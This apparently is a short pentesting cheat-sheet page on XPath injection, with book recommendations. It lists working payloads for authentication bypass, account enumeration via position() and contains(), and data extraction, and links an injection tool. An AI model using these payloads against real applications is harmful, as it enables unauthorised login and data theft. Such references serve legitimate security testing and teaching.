XPath Injection

Authentication Bypass

'or true() or '

# Finding an interesting account

 # Small DB - position() - increment the id

' or position()=1 '

# Large DB - contains() string

' or contains(., 'admin') or '

Data extraction

knownParameter' or '1'='1

random| // text()

Blind XPAth Injection

GitHub - orf/xcat: XPath injection toolGitHub

Resources

Injections XPath : principes, exploitations & sécuritéVAADATA - Ethical Hacking Services

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

PreviousMarkdown injection NextHTTP Verb Tampering

Last updated 6 months ago